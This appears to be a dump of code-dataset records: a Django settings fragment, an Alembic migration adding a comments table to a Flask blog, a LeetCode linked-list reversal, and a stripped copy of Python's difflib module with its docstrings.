'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
b10320e26ac1231b5798ceb5c5971938a8e25da7 | a0a6f5b63ba8c9265a1666d177af06d4341665d8 | /migrations/versions/27bb9f2d78c9_.py | f39d1f19e47b45370b8f60ae70110c6d7c6fa8af | [] | no_license | Erick-LONG/flask_blog | bc0ea2fae61e254b333c46402acc4bea2208156b | 92c4be13b020c757719be3f0dd6429d6d4a72251 | refs/heads/master | 2020-12-30T12:22:44.229048 | 2017-06-11T08:15:57 | 2017-06-11T08:15:57 | 91,423,280 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,299 | py | """empty message
Revision ID: 27bb9f2d78c9
Revises: 423700be3811
Create Date: 2017-06-04 09:34:09.964915
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '27bb9f2d78c9'
down_revision = '423700be3811'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('comments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('body_html', sa.Text(), nullable=True),
sa.Column('disabled', sa.Boolean(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('post_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['post_id'], ['posts.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_comments_timestamp'), 'comments', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_comments_timestamp'), table_name='comments')
op.drop_table('comments')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
51d9c3dd96680680f656cff6802e31fde8dc50ba | e545395ef78b1e396076dddd726444be28576290 | /lt206.py | 7145b70e0597c724642d435c7a051ef382fce95d | [] | no_license | Francis1998/leetcode | bb38fe91145b57e657ec812bebd95d3e30be3b96 | 9fbab5fe97026f7fa6e7124321480a7e20d5b72a | refs/heads/master | 2023-04-22T02:45:57.223755 | 2021-05-08T12:47:23 | 2021-05-08T12:47:23 | 318,083,503 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | # 转一个单链表。
# 示例:
# 输入: 1->2->3->4->5->NULL
# 输出: 5->4->3->2->1->NULL
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class ListNode:
def __init__(self,x):
self.val = x
self.next = None
class Solution:
def reverseList(self, head: ListNode) -> ListNode:
tail = ListNode(0)
p_tail = tail
p = head
res = []
while p:
res.append(p.val)
p=p.next
for i in range(len(res)):
tail.next = ListNode(res.pop())
tail=tail.next
return p_tail.next | [
"[email protected]"
] | |
2b2cf283e10607104a1fb29f226644d2bf770d7c | 8957f0b42ba945399a2eeb71f796c11c9eb35b06 | /stripped/difflib.py | eeb579a9d6c6d3107ab1db1787d6193e62a92920 | [] | no_license | notro/tmp_CircuitPython_stdlib | 4de177cbb45b2209f07171c27f844c7d377dffc9 | 641727294039a9441c35ba1a1d22de403664b710 | refs/heads/master | 2020-03-27T18:26:33.544047 | 2019-02-15T20:49:34 | 2019-02-15T20:49:34 | 146,922,496 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 80,226 | py | """
Module difflib -- helpers for computing deltas between objects.
Function get_close_matches(word, possibilities, n=3, cutoff=0.6):
Use SequenceMatcher to return list of the best "good enough" matches.
Function context_diff(a, b):
For two lists of strings, return a delta in context diff format.
Function ndiff(a, b):
Return a delta: the difference between `a` and `b` (lists of strings).
Function restore(delta, which):
Return one of the two sequences that generated an ndiff delta.
Function unified_diff(a, b):
For two lists of strings, return a delta in unified diff format.
Class SequenceMatcher:
A flexible class for comparing pairs of sequences of any type.
Class Differ:
For producing human-readable deltas from sequences of lines of text.
Class HtmlDiff:
For producing HTML side by side comparison with change highlights.
"""
from collections import namedtuple as _namedtuple
Match = _namedtuple('Match', 'a b size')
def _calculate_ratio(matches, length):
if length:
return 2.0 * matches / length
return 1.0
class SequenceMatcher:
"""
SequenceMatcher is a flexible class for comparing pairs of sequences of
any type, so long as the sequence elements are hashable. The basic
algorithm predates, and is a little fancier than, an algorithm
published in the late 1980's by Ratcliff and Obershelp under the
hyperbolic name "gestalt pattern matching". The basic idea is to find
the longest contiguous matching subsequence that contains no "junk"
elements (R-O doesn't address junk). The same idea is then applied
recursively to the pieces of the sequences to the left and to the right
of the matching subsequence. This does not yield minimal edit
sequences, but does tend to yield matches that "look right" to people.
SequenceMatcher tries to compute a "human-friendly diff" between two
sequences. Unlike e.g. UNIX(tm) diff, the fundamental notion is the
longest *contiguous* & junk-free matching subsequence. That's what
catches peoples' eyes. The Windows(tm) windiff has another interesting
notion, pairing up elements that appear uniquely in each sequence.
That, and the method here, appear to yield more intuitive difference
reports than does diff. This method appears to be the least vulnerable
to synching up on blocks of "junk lines", though (like blank lines in
ordinary text files, or maybe "<P>" lines in HTML files). That may be
because this is the only method of the 3 that has a *concept* of
"junk" <wink>.
Example, comparing two strings, and considering blanks to be "junk":
>>> s = SequenceMatcher(lambda x: x == " ",
... "private Thread currentThread;",
... "private volatile Thread currentThread;")
>>>
.ratio() returns a float in [0, 1], measuring the "similarity" of the
sequences. As a rule of thumb, a .ratio() value over 0.6 means the
sequences are close matches:
>>> print(round(s.ratio(), 3))
0.866
>>>
If you're only interested in where the sequences match,
.get_matching_blocks() is handy:
>>> for block in s.get_matching_blocks():
... print("a[%d] and b[%d] match for %d elements" % block)
a[0] and b[0] match for 8 elements
a[8] and b[17] match for 21 elements
a[29] and b[38] match for 0 elements
Note that the last tuple returned by .get_matching_blocks() is always a
dummy, (len(a), len(b), 0), and this is the only case in which the last
tuple element (number of elements matched) is 0.
If you want to know how to change the first sequence into the second,
use .get_opcodes():
>>> for opcode in s.get_opcodes():
... print("%6s a[%d:%d] b[%d:%d]" % opcode)
equal a[0:8] b[0:8]
insert a[8:8] b[8:17]
equal a[8:29] b[17:38]
See the Differ class for a fancy human-friendly file differencer, which
uses SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
See also function get_close_matches() in this module, which shows how
simple code building on SequenceMatcher can be used to do useful work.
Timing: Basic R-O is cubic time worst case and quadratic time expected
case. SequenceMatcher is quadratic time for the worst case and has
expected-case behavior dependent in a complicated way on how many
elements the sequences have in common; best case time is linear.
Methods:
__init__(isjunk=None, a='', b='')
Construct a SequenceMatcher.
set_seqs(a, b)
Set the two sequences to be compared.
set_seq1(a)
Set the first sequence to be compared.
set_seq2(b)
Set the second sequence to be compared.
find_longest_match(alo, ahi, blo, bhi)
Find longest matching block in a[alo:ahi] and b[blo:bhi].
get_matching_blocks()
Return list of triples describing matching subsequences.
get_opcodes()
Return list of 5-tuples describing how to turn a into b.
ratio()
Return a measure of the sequences' similarity (float in [0,1]).
quick_ratio()
Return an upper bound on .ratio() relatively quickly.
real_quick_ratio()
Return an upper bound on ratio() very quickly.
"""
def __init__(self, isjunk=None, a='', b='', autojunk=True):
"""Construct a SequenceMatcher.
Optional arg isjunk is None (the default), or a one-argument
function that takes a sequence element and returns true iff the
element is junk. None is equivalent to passing "lambda x: 0", i.e.
no elements are considered to be junk. For example, pass
lambda x: x in " \\t"
if you're comparing lines as sequences of characters, and don't
want to synch up on blanks or hard tabs.
Optional arg a is the first of two sequences to be compared. By
default, an empty string. The elements of a must be hashable. See
also .set_seqs() and .set_seq1().
Optional arg b is the second of two sequences to be compared. By
default, an empty string. The elements of b must be hashable. See
also .set_seqs() and .set_seq2().
Optional arg autojunk should be set to False to disable the
"automatic junk heuristic" that treats popular elements as junk
(see module documentation for more information).
"""
# Members:
# a
# first sequence
# b
# second sequence; differences are computed as "what do
# we need to do to 'a' to change it into 'b'?"
# b2j
# for x in b, b2j[x] is a list of the indices (into b)
# at which x appears; junk and popular elements do not appear
# fullbcount
# for x in b, fullbcount[x] == the number of times x
# appears in b; only materialized if really needed (used
# only for computing quick_ratio())
# matching_blocks
# a list of (i, j, k) triples, where a[i:i+k] == b[j:j+k];
# ascending & non-overlapping in i and in j; terminated by
# a dummy (len(a), len(b), 0) sentinel
# opcodes
# a list of (tag, i1, i2, j1, j2) tuples, where tag is
# one of
# 'replace' a[i1:i2] should be replaced by b[j1:j2]
# 'delete' a[i1:i2] should be deleted
# 'insert' b[j1:j2] should be inserted
# 'equal' a[i1:i2] == b[j1:j2]
# isjunk
# a user-supplied function taking a sequence element and
# returning true iff the element is "junk" -- this has
# subtle but helpful effects on the algorithm, which I'll
# get around to writing up someday <0.9 wink>.
# DON'T USE! Only __chain_b uses this. Use "in self.bjunk".
# bjunk
# the items in b for which isjunk is True.
# bpopular
# nonjunk items in b treated as junk by the heuristic (if used).
self.isjunk = isjunk
self.a = self.b = None
self.autojunk = autojunk
self.set_seqs(a, b)
def set_seqs(self, a, b):
"""Set the two sequences to be compared.
>>> s = SequenceMatcher()
>>> s.set_seqs("abcd", "bcde")
>>> s.ratio()
0.75
"""
self.set_seq1(a)
self.set_seq2(b)
def set_seq1(self, a):
"""Set the first sequence to be compared.
The second sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq1("bcde")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq2().
"""
if a is self.a:
return
self.a = a
self.matching_blocks = self.opcodes = None
def set_seq2(self, b):
"""Set the second sequence to be compared.
The first sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq2("abcd")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq1().
"""
if b is self.b:
return
self.b = b
self.matching_blocks = self.opcodes = None
self.fullbcount = None
self.__chain_b()
# For each element x in b, set b2j[x] to a list of the indices in
# b where x appears; the indices are in increasing order; note that
# the number of times x appears in b is len(b2j[x]) ...
# when self.isjunk is defined, junk elements don't show up in this
# map at all, which stops the central find_longest_match method
# from starting any matching block at a junk element ...
# b2j also does not contain entries for "popular" elements, meaning
# elements that account for more than 1 + 1% of the total elements, and
# when the sequence is reasonably large (>= 200 elements); this can
# be viewed as an adaptive notion of semi-junk, and yields an enormous
# speedup when, e.g., comparing program files with hundreds of
# instances of "return NULL;" ...
# note that this is only called when b changes; so for cross-product
# kinds of matches, it's best to call set_seq2 once, then set_seq1
# repeatedly
def __chain_b(self):
# Because isjunk is a user-defined (not C) function, and we test
# for junk a LOT, it's important to minimize the number of calls.
# Before the tricks described here, __chain_b was by far the most
# time-consuming routine in the whole module! If anyone sees
# Jim Roskind, thank him again for profile.py -- I never would
# have guessed that.
# The first trick is to build b2j ignoring the possibility
# of junk. I.e., we don't call isjunk at all yet. Throwing
# out the junk later is much cheaper than building b2j "right"
# from the start.
b = self.b
self.b2j = b2j = {}
for i, elt in enumerate(b):
indices = b2j.setdefault(elt, [])
indices.append(i)
# Purge junk elements
self.bjunk = junk = set()
isjunk = self.isjunk
if isjunk:
for elt in b2j.keys():
if isjunk(elt):
junk.add(elt)
for elt in junk: # separate loop avoids separate list of keys
del b2j[elt]
# Purge popular elements that are not junk
self.bpopular = popular = set()
n = len(b)
if self.autojunk and n >= 200:
ntest = n // 100 + 1
for elt, idxs in b2j.items():
if len(idxs) > ntest:
popular.add(elt)
for elt in popular: # ditto; as fast for 1% deletion
del b2j[elt]
def find_longest_match(self, alo, ahi, blo, bhi):
"""Find longest matching block in a[alo:ahi] and b[blo:bhi].
If isjunk is not defined:
Return (i,j,k) such that a[i:i+k] is equal to b[j:j+k], where
alo <= i <= i+k <= ahi
blo <= j <= j+k <= bhi
and for all (i',j',k') meeting those conditions,
k >= k'
i <= i'
and if i == i', j <= j'
In other words, of all maximal matching blocks, return one that
starts earliest in a, and of all those maximal matching blocks that
start earliest in a, return the one that starts earliest in b.
>>> s = SequenceMatcher(None, " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=0, b=4, size=5)
If isjunk is defined, first the longest matching block is
determined as above, but with the additional restriction that no
junk element appears in the block. Then that block is extended as
far as possible by matching (only) junk elements on both sides. So
the resulting block never matches on junk except as identical junk
happens to be adjacent to an "interesting" match.
Here's the same example as before, but considering blanks to be
junk. That prevents " abcd" from matching the " abcd" at the tail
end of the second sequence directly. Instead only the "abcd" can
match, and matches the leftmost "abcd" in the second sequence:
>>> s = SequenceMatcher(lambda x: x==" ", " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=1, b=0, size=4)
If no blocks match, return (alo, blo, 0).
>>> s = SequenceMatcher(None, "ab", "c")
>>> s.find_longest_match(0, 2, 0, 1)
Match(a=0, b=0, size=0)
"""
# CAUTION: stripping common prefix or suffix would be incorrect.
# E.g.,
# ab
# acab
# Longest matching block is "ab", but if common prefix is
# stripped, it's "a" (tied with "b"). UNIX(tm) diff does so
# strip, so ends up claiming that ab is changed to acab by
# inserting "ca" in the middle. That's minimal but unintuitive:
# "it's obvious" that someone inserted "ac" at the front.
# Windiff ends up at the same place as diff, but by pairing up
# the unique 'b's and then matching the first two 'a's.
a, b, b2j, isbjunk = self.a, self.b, self.b2j, self.bjunk.__contains__
besti, bestj, bestsize = alo, blo, 0
# find longest junk-free match
# during an iteration of the loop, j2len[j] = length of longest
# junk-free match ending with a[i-1] and b[j]
j2len = {}
nothing = []
for i in range(alo, ahi):
# look at all instances of a[i] in b; note that because
# b2j has no junk keys, the loop is skipped if a[i] is junk
j2lenget = j2len.get
newj2len = {}
for j in b2j.get(a[i], nothing):
# a[i] matches b[j]
if j < blo:
continue
if j >= bhi:
break
k = newj2len[j] = j2lenget(j-1, 0) + 1
if k > bestsize:
besti, bestj, bestsize = i-k+1, j-k+1, k
j2len = newj2len
# Extend the best by non-junk elements on each end. In particular,
# "popular" non-junk elements aren't in b2j, which greatly speeds
# the inner loop above, but also means "the best" match so far
# doesn't contain any junk *or* popular non-junk elements.
while besti > alo and bestj > blo and \
not isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
not isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize += 1
# Now that we have a wholly interesting match (albeit possibly
# empty!), we may as well suck up the matching junk on each
# side of it too. Can't think of a good reason not to, and it
# saves post-processing the (possibly considerable) expense of
# figuring out what to do with it. In the case of an empty
# interesting match, this is clearly the right thing to do,
# because no other kind of match is possible in the regions.
while besti > alo and bestj > blo and \
isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize = bestsize + 1
return Match(besti, bestj, bestsize)
def get_matching_blocks(self):
"""Return list of triples describing matching subsequences.
Each triple is of the form (i, j, n), and means that
a[i:i+n] == b[j:j+n]. The triples are monotonically increasing in
i and in j. New in Python 2.5, it's also guaranteed that if
(i, j, n) and (i', j', n') are adjacent triples in the list, and
the second is not the last triple in the list, then i+n != i' or
j+n != j'. IOW, adjacent triples never describe adjacent equal
blocks.
The last triple is a dummy, (len(a), len(b), 0), and is the only
triple with n==0.
>>> s = SequenceMatcher(None, "abxcd", "abcd")
>>> list(s.get_matching_blocks())
[Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]
"""
if self.matching_blocks is not None:
return self.matching_blocks
la, lb = len(self.a), len(self.b)
# This is most naturally expressed as a recursive algorithm, but
# at least one user bumped into extreme use cases that exceeded
# the recursion limit on their box. So, now we maintain a list
# ('queue`) of blocks we still need to look at, and append partial
# results to `matching_blocks` in a loop; the matches are sorted
# at the end.
queue = [(0, la, 0, lb)]
matching_blocks = []
while queue:
alo, ahi, blo, bhi = queue.pop()
i, j, k = x = self.find_longest_match(alo, ahi, blo, bhi)
# a[alo:i] vs b[blo:j] unknown
# a[i:i+k] same as b[j:j+k]
# a[i+k:ahi] vs b[j+k:bhi] unknown
if k: # if k is 0, there was no matching block
matching_blocks.append(x)
if alo < i and blo < j:
queue.append((alo, i, blo, j))
if i+k < ahi and j+k < bhi:
queue.append((i+k, ahi, j+k, bhi))
matching_blocks.sort()
# It's possible that we have adjacent equal blocks in the
# matching_blocks list now. Starting with 2.5, this code was added
# to collapse them.
i1 = j1 = k1 = 0
non_adjacent = []
for i2, j2, k2 in matching_blocks:
# Is this block adjacent to i1, j1, k1?
if i1 + k1 == i2 and j1 + k1 == j2:
# Yes, so collapse them -- this just increases the length of
# the first block by the length of the second, and the first
# block so lengthened remains the block to compare against.
k1 += k2
else:
# Not adjacent. Remember the first block (k1==0 means it's
# the dummy we started with), and make the second block the
# new block to compare against.
if k1:
non_adjacent.append((i1, j1, k1))
i1, j1, k1 = i2, j2, k2
if k1:
non_adjacent.append((i1, j1, k1))
non_adjacent.append( (la, lb, 0) )
class _M: ###
def __init__(self, obj): ###
self.obj = obj ###
def __call__(self, iterable): ###
return self.obj(*iterable) ###
self.matching_blocks = list(map(_M(Match), non_adjacent)) ###
return self.matching_blocks
def get_opcodes(self):
"""Return list of 5-tuples describing how to turn a into b.
Each tuple is of the form (tag, i1, i2, j1, j2). The first tuple
has i1 == j1 == 0, and remaining tuples have i1 == the i2 from the
tuple preceding it, and likewise for j1 == the previous j2.
The tags are strings, with these meanings:
'replace': a[i1:i2] should be replaced by b[j1:j2]
'delete': a[i1:i2] should be deleted.
Note that j1==j2 in this case.
'insert': b[j1:j2] should be inserted at a[i1:i1].
Note that i1==i2 in this case.
'equal': a[i1:i2] == b[j1:j2]
>>> a = "qabxcd"
>>> b = "abycdf"
>>> s = SequenceMatcher(None, a, b)
>>> for tag, i1, i2, j1, j2 in s.get_opcodes():
... print(("%7s a[%d:%d] (%s) b[%d:%d] (%s)" %
... (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2])))
delete a[0:1] (q) b[0:0] ()
equal a[1:3] (ab) b[0:2] (ab)
replace a[3:4] (x) b[2:3] (y)
equal a[4:6] (cd) b[3:5] (cd)
insert a[6:6] () b[5:6] (f)
"""
if self.opcodes is not None:
return self.opcodes
i = j = 0
self.opcodes = answer = []
for ai, bj, size in self.get_matching_blocks():
# invariant: we've pumped out correct diffs to change
# a[:i] into b[:j], and the next matching block is
# a[ai:ai+size] == b[bj:bj+size]. So we need to pump
# out a diff to change a[i:ai] into b[j:bj], pump out
# the matching block, and move (i,j) beyond the match
tag = ''
if i < ai and j < bj:
tag = 'replace'
elif i < ai:
tag = 'delete'
elif j < bj:
tag = 'insert'
if tag:
answer.append( (tag, i, ai, j, bj) )
i, j = ai+size, bj+size
# the list of matching blocks is terminated by a
# sentinel with size 0
if size:
answer.append( ('equal', ai, i, bj, j) )
return answer
def get_grouped_opcodes(self, n=3):
""" Isolate change clusters by eliminating ranges with no changes.
Return a generator of groups with up to n lines of context.
Each group is in the same format as returned by get_opcodes().
>>> from pprint import pprint
>>> a = list(map(str, range(1,40)))
>>> b = a[:]
>>> b[8:8] = ['i'] # Make an insertion
>>> b[20] += 'x' # Make a replacement
>>> b[23:28] = [] # Make a deletion
>>> b[30] += 'y' # Make another replacement
>>> pprint(list(SequenceMatcher(None,a,b).get_grouped_opcodes()))
[[('equal', 5, 8, 5, 8), ('insert', 8, 8, 8, 9), ('equal', 8, 11, 9, 12)],
[('equal', 16, 19, 17, 20),
('replace', 19, 20, 20, 21),
('equal', 20, 22, 21, 23),
('delete', 22, 27, 23, 23),
('equal', 27, 30, 23, 26)],
[('equal', 31, 34, 27, 30),
('replace', 34, 35, 30, 31),
('equal', 35, 38, 31, 34)]]
"""
codes = self.get_opcodes()
if not codes:
codes = [("equal", 0, 1, 0, 1)]
# Fixup leading and trailing groups if they show no changes.
if codes[0][0] == 'equal':
tag, i1, i2, j1, j2 = codes[0]
codes[0] = tag, max(i1, i2-n), i2, max(j1, j2-n), j2
if codes[-1][0] == 'equal':
tag, i1, i2, j1, j2 = codes[-1]
codes[-1] = tag, i1, min(i2, i1+n), j1, min(j2, j1+n)
nn = n + n
group = []
for tag, i1, i2, j1, j2 in codes:
# End the current group and start a new one whenever
# there is a large range with no changes.
if tag == 'equal' and i2-i1 > nn:
group.append((tag, i1, min(i2, i1+n), j1, min(j2, j1+n)))
yield group
group = []
i1, j1 = max(i1, i2-n), max(j1, j2-n)
group.append((tag, i1, i2, j1 ,j2))
if group and not (len(group)==1 and group[0][0] == 'equal'):
yield group
def ratio(self):
"""Return a measure of the sequences' similarity (float in [0,1]).
Where T is the total number of elements in both sequences, and
M is the number of matches, this is 2.0*M / T.
Note that this is 1 if the sequences are identical, and 0 if
they have nothing in common.
.ratio() is expensive to compute if you haven't already computed
.get_matching_blocks() or .get_opcodes(), in which case you may
want to try .quick_ratio() or .real_quick_ratio() first to get an
upper bound.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.quick_ratio()
0.75
>>> s.real_quick_ratio()
1.0
"""
matches = sum(triple[-1] for triple in self.get_matching_blocks())
return _calculate_ratio(matches, len(self.a) + len(self.b))
def quick_ratio(self):
"""Return an upper bound on ratio() relatively quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute.
"""
# viewing a and b as multisets, set matches to the cardinality
# of their intersection; this counts the number of matches
# without regard to order, so is clearly an upper bound
if self.fullbcount is None:
self.fullbcount = fullbcount = {}
for elt in self.b:
fullbcount[elt] = fullbcount.get(elt, 0) + 1
fullbcount = self.fullbcount
# avail[x] is the number of times x appears in 'b' less the
# number of times we've seen it in 'a' so far ... kinda
avail = {}
matches = 0 ###
for elt in self.a:
if elt in avail: ###
numb = avail[elt]
else:
numb = fullbcount.get(elt, 0)
avail[elt] = numb - 1
if numb > 0:
matches = matches + 1
return _calculate_ratio(matches, len(self.a) + len(self.b))
def real_quick_ratio(self):
"""Return an upper bound on ratio() very quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute than either .ratio() or .quick_ratio().
"""
la, lb = len(self.a), len(self.b)
# can't have more matches than the number of elements in the
# shorter sequence
return _calculate_ratio(min(la, lb), la + lb)
def _count_leading(line, ch):
"""
Return number of `ch` characters at the start of `line`.
Example:
>>> _count_leading(' abc', ' ')
3
"""
i, n = 0, len(line)
while i < n and line[i] == ch:
i += 1
return i
class Differ:
r"""
Differ is a class for comparing sequences of lines of text, and
producing human-readable differences or deltas. Differ uses
SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
Each line of a Differ delta begins with a two-letter code:
'- ' line unique to sequence 1
'+ ' line unique to sequence 2
' ' line common to both sequences
'? ' line not present in either input sequence
Lines beginning with '? ' attempt to guide the eye to intraline
differences, and were not present in either input sequence. These lines
can be confusing if the sequences contain tab characters.
Note that Differ makes no claim to produce a *minimal* diff. To the
contrary, minimal diffs are often counter-intuitive, because they synch
up anywhere possible, sometimes accidental matches 100 pages apart.
Restricting synch points to contiguous matches preserves some notion of
locality, at the occasional cost of producing a longer diff.
Example: Comparing two texts.
First we set up the texts, sequences of individual single-line strings
ending with newlines (such sequences can also be obtained from the
`readlines()` method of file-like objects):
>>> text1 = ''' 1. Beautiful is better than ugly.
... 2. Explicit is better than implicit.
... 3. Simple is better than complex.
... 4. Complex is better than complicated.
... '''.splitlines(keepends=True)
>>> len(text1)
4
>>> text1[0][-1]
'\n'
>>> text2 = ''' 1. Beautiful is better than ugly.
... 3. Simple is better than complex.
... 4. Complicated is better than complex.
... 5. Flat is better than nested.
... '''.splitlines(keepends=True)
Next we instantiate a Differ object:
>>> d = Differ()
Note that when instantiating a Differ object we may pass functions to
filter out line and character 'junk'. See Differ.__init__ for details.
Finally, we compare the two:
>>> result = list(d.compare(text1, text2))
'result' is a list of strings, so let's pretty-print it:
>>> from pprint import pprint as _pprint
>>> _pprint(result)
[' 1. Beautiful is better than ugly.\n',
'- 2. Explicit is better than implicit.\n',
'- 3. Simple is better than complex.\n',
'+ 3. Simple is better than complex.\n',
'? ++\n',
'- 4. Complex is better than complicated.\n',
'? ^ ---- ^\n',
'+ 4. Complicated is better than complex.\n',
'? ++++ ^ ^\n',
'+ 5. Flat is better than nested.\n']
As a single multi-line string it looks like this:
>>> print(''.join(result), end="")
1. Beautiful is better than ugly.
- 2. Explicit is better than implicit.
- 3. Simple is better than complex.
+ 3. Simple is better than complex.
? ++
- 4. Complex is better than complicated.
? ^ ---- ^
+ 4. Complicated is better than complex.
? ++++ ^ ^
+ 5. Flat is better than nested.
Methods:
__init__(linejunk=None, charjunk=None)
Construct a text differencer, with optional filters.
compare(a, b)
Compare two sequences of lines; generate the resulting delta.
"""
def __init__(self, linejunk=None, charjunk=None):
"""
Construct a text differencer, with optional filters.
The two optional keyword parameters are for filter functions:
- `linejunk`: A function that should accept a single string argument,
and return true iff the string is junk. The module-level function
`IS_LINE_JUNK` may be used to filter out lines without visible
characters, except for at most one splat ('#'). It is recommended
to leave linejunk None; as of Python 2.3, the underlying
SequenceMatcher class has grown an adaptive notion of "noise" lines
that's better than any static definition the author has ever been
able to craft.
- `charjunk`: A function that should accept a string of length 1. The
module-level function `IS_CHARACTER_JUNK` may be used to filter out
whitespace characters (a blank or tab; **note**: bad idea to include
newline in this!). Use of IS_CHARACTER_JUNK is recommended.
"""
self.linejunk = linejunk
self.charjunk = charjunk
def compare(self, a, b):
r"""
Compare two sequences of lines; generate the resulting delta.
Each sequence must contain individual single-line strings ending with
newlines. Such sequences can be obtained from the `readlines()` method
of file-like objects. The delta generated also consists of newline-
terminated strings, ready to be printed as-is via the writeline()
method of a file-like object.
Example:
>>> print(''.join(Differ().compare('one\ntwo\nthree\n'.splitlines(True),
... 'ore\ntree\nemu\n'.splitlines(True))),
... end="")
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
cruncher = SequenceMatcher(self.linejunk, a, b)
for tag, alo, ahi, blo, bhi in cruncher.get_opcodes():
if tag == 'replace':
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
elif tag == 'delete':
g = self._dump('-', a, alo, ahi)
elif tag == 'insert':
g = self._dump('+', b, blo, bhi)
elif tag == 'equal':
g = self._dump(' ', a, alo, ahi)
else:
raise ValueError('unknown tag %r' % (tag,))
yield from g
def _dump(self, tag, x, lo, hi):
"""Generate comparison results for a same-tagged range."""
for i in range(lo, hi):
yield '%s %s' % (tag, x[i])
def _plain_replace(self, a, alo, ahi, b, blo, bhi):
assert alo < ahi and blo < bhi
# dump the shorter block first -- reduces the burden on short-term
# memory if the blocks are of very different sizes
if bhi - blo < ahi - alo:
first = self._dump('+', b, blo, bhi)
second = self._dump('-', a, alo, ahi)
else:
first = self._dump('-', a, alo, ahi)
second = self._dump('+', b, blo, bhi)
for g in first, second:
yield from g
def _fancy_replace(self, a, alo, ahi, b, blo, bhi):
r"""
When replacing one block of lines with another, search the blocks
for *similar* lines; the best-matching pair (if any) is used as a
synch point, and intraline difference marking is done on the
similar pair. Lots of work, but often worth it.
Example:
>>> d = Differ()
>>> results = d._fancy_replace(['abcDefghiJkl\n'], 0, 1,
... ['abcdefGhijkl\n'], 0, 1)
>>> print(''.join(results), end="")
- abcDefghiJkl
? ^ ^ ^
+ abcdefGhijkl
? ^ ^ ^
"""
# don't synch up unless the lines have a similarity score of at
# least cutoff; best_ratio tracks the best score seen so far
best_ratio, cutoff = 0.74, 0.75
cruncher = SequenceMatcher(self.charjunk)
eqi, eqj = None, None # 1st indices of equal lines (if any)
# search for the pair that matches best without being identical
# (identical lines must be junk lines, & we don't want to synch up
# on junk -- unless we have to)
for j in range(blo, bhi):
bj = b[j]
cruncher.set_seq2(bj)
for i in range(alo, ahi):
ai = a[i]
if ai == bj:
if eqi is None:
eqi, eqj = i, j
continue
cruncher.set_seq1(ai)
# computing similarity is expensive, so use the quick
# upper bounds first -- have seen this speed up messy
# compares by a factor of 3.
# note that ratio() is only expensive to compute the first
# time it's called on a sequence pair; the expensive part
# of the computation is cached by cruncher
if cruncher.real_quick_ratio() > best_ratio and \
cruncher.quick_ratio() > best_ratio and \
cruncher.ratio() > best_ratio:
best_ratio, best_i, best_j = cruncher.ratio(), i, j
if best_ratio < cutoff:
# no non-identical "pretty close" pair
if eqi is None:
# no identical pair either -- treat it as a straight replace
yield from self._plain_replace(a, alo, ahi, b, blo, bhi)
return
# no close pair, but an identical pair -- synch up on that
best_i, best_j, best_ratio = eqi, eqj, 1.0
else:
# there's a close pair, so forget the identical pair (if any)
eqi = None
# a[best_i] very similar to b[best_j]; eqi is None iff they're not
# identical
# pump out diffs from before the synch point
yield from self._fancy_helper(a, alo, best_i, b, blo, best_j)
